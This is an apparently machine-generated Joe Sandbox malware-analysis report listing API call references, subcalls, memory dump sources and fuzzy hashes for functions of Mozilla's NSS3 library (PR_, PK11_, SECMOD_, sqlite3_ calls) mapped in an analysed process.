                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                      • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                      • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                      • Opcode ID: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
                                                                                                                                                                                                                                                      • Instruction ID: 897c31a8b1060092653288bfd06bfe4c0126d4ca17aff29620e7d388ce14d90e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F501A7B170371537EA10277A5D69F66366C9F42199F180435FE04F0A41EBF2F61940BD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5857
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C586B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C5888
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C58B9
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C58CD
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C58E9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,00000000,?,6C4C5915,?), ref: 6C4C5556
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,6C4C5915,?), ref: 6C4C556F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: PR_Unlock.NSS3(?,?,?,?,?), ref: 6C4C559C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: SECMOD_UpdateSlotList.NSS3(?,?,?,?,?), ref: 6C4C55A4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: PR_Sleep.NSS3(?,?,?,?), ref: 6C4C5643
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,?), ref: 6C4C5653
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 6C4C5668
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE098,00000000), ref: 6C4C5934
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4C59AA
                                                                                                                                                                                                                                                      • SECMOD_UpdateSlotList.NSS3(?), ref: 6C4C59B3
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C5A4D
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C5A61
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C5A7A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionValue$Unlock$ErrorListSlotUpdate$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1180358131-0
                                                                                                                                                                                                                                                      • Opcode ID: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
                                                                                                                                                                                                                                                      • Instruction ID: 6ab9620a04b6650978e7c14f5bbfbbb6dff2b9624a341b4c4c845950ed8b045e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F81F0B9F006019BEB00DF29DC81E6E77B5BF45328F140528E84A86B62E731E955CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetErrorText.NSS3(00000000,00000000,?,6C4878F8), ref: 6C4C4E6D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C4606A2,00000000,?), ref: 6C4609F8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4609E0: malloc.MOZGLUE(0000001F), ref: 6C460A18
                                                                                                                                                                                                                                                        • Part of subcall function 6C4609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C460A33
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C4878F8), ref: 6C4C4ED9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703,?,00000000,00000000), ref: 6C4B5942
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703), ref: 6C4B5954
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B596A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B5984
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C4B5999
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59BA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C4B59D3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B59F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C4B5A0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: free.MOZGLUE(00000000), ref: 6C4B5A2E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C4B5A43
                                                                                                                                                                                                                                                      • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C484C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C4C4EB8,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C486D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C4C4EB8,?), ref: 6C4C4884
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4EC0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4470: TlsGetValue.KERNEL32(00000000,?,6C487296,00000000), ref: 6C4C4487
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4470: EnterCriticalSection.KERNEL32(?,?,?,6C487296,00000000), ref: 6C4C44A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C4470: PR_Unlock.NSS3(?,?,?,?,6C487296,00000000), ref: 6C4C44BB
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F16
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F2E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F40
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F6C
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F80
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C4F8F
                                                                                                                                                                                                                                                      • PK11_UpdateSlotAttribute.NSS3(?,6C59DCB0,00000000), ref: 6C4C4FFE
                                                                                                                                                                                                                                                      • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C4C501F
                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C4878F8), ref: 6C4C506B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 560490210-0
                                                                                                                                                                                                                                                      • Opcode ID: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                                                      • Instruction ID: fec6ad715783ffef66338e84313217c14c5c2cfc5b80a54873538c41b8c1c695
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c64f7c710ce87e8d176b0a701da8deeebb42678f96b8a54836d2cad010331643
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA5103B9E002019BEB01DF25EC01EAA76B4EF0535EF150138EC0696B21FB31E915CAE7
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 786543732-0
                                                                                                                                                                                                                                                      • Opcode ID: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                                                      • Instruction ID: e4136dce846dc07b2b1b628d8241d503ebaf67a9ddac1e82fb0142ab584fcff0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cb28613af993ede68c4c457c8409bf42864b8e0f06decce65a4ab1284eab00f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6519AB0A41A259BDF00DF9ADC45EAE77B5EF06359F050029E805A7F00D331BA45CBEA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6C544CAF
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544CFD
                                                                                                                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6C544D44
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                      • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                      • Opcode ID: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                                                      • Instruction ID: abdb078b6f1cb5ac802598a5a5fa0d5719041f84daac4afad17d0cb2abfc312a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6616b7fd87b92775a9e3805ba21952d50fe098e7fd2d1a2228ebbce1734ed3cb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78319973EC4951A7E7088E24AC01BA973617792318F1AC529D8246BE58DF71AC5283E2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C542D9F
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • sqlite3_exec.NSS3(?,?,6C542F70,?,?), ref: 6C542DF9
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C542E2C
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E3A
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E52
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C542E62
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E70
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542E89
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542EBB
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542ECB
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C542F3E
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C542F4C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2120,Function_00097E60,00000000,?,?,?,?,6C50067D,6C501C60,00000000), ref: 6C487C81
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C487CA0
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C487CB4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C487CCF
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C487D04
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C487D1B
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(-00000050), ref: 6C487D82
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C487DF4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C487E0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
                                                                                                                                                                                                                                                      • strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D79A7
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D11
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D2A
                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D4A
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D57
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4D97
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DBA
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3 ref: 6C3F4DD4
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DE6
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4DEF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3388019835-0
                                                                                                                                                                                                                                                      • Opcode ID: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
                                                                                                                                                                                                                                                      • Instruction ID: 2052eeb9d1768aaaa765d0733675a89cc7dedcc86daed1b2f777d25f2ce6f245
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e179037cf5a98cdaf7d4df863126fc5dd625a27a64363bf515a41e093b4bd1e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C94172B5A04725CFCB00AF78D984559B7B4BF05318F064A69E8589BB11E730E885CFD9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                                                      • PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
